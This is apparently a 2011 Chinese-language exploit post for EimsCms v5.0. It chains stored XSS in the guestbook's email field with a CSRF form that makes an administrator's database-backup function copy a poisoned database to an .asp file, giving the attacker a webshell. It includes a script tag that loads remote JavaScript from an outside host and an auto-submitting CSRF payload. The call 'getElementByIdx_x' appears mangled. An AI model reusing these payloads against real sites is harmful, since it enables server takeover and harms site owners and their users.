EimsCms v5.0 XSS+CSRF=GetShell
时间:2011-01-28 来源:B0mbErM@n
发布日期:2011-01.28
发布作者:B0mbErM@n
影响版本:EimsCms v5.0
官方网站:http://www.eimscms.com/
漏洞类型:跨站XSS
漏洞描述:未对Book.asp邮箱等处进行符号转义,导致XSS跨站执行漏洞。
------GetShell-----
[1] 在Book.asp的邮箱处填写一句话,提交
[2] 在Book.asp的邮箱处填写XSS语句中的CSRF
[3] 等待管理员触发XSS语句,然后一句话连接bem.asp
[要求] 默认后台管理目录/数据库
[注意] 管理触发XSS是在后台查看留言
------ X S S -----
Book.asp
在邮箱里处写入XSS语句即可
用XSS调用CSRF,例如把CSRF去转成JS的则用
<SCRIPT SRC=http://521.im/xss.js></SCRIPT>
----- CSRF -----
<form method="post" action="http://127.0.0.1:99/admin/DataM.asp?eims=Data&Action=bfstart">
<input name="olddata" type="text" id="olddata" value="../Data/eimsCMS.mdb" size="45" readonly>
<input name="newdata" type="text" id="newdata" size="45" value="../bem.asp">
<input type="submit" name="Submit" value="开始备份" id="bem"/>
</form>
<script>
document.getElementByIdx_x('bem').click();
</script>
----- 分析 -----
未对Book.asp邮箱等处进行符号转义
未过滤提交语句
标签分类: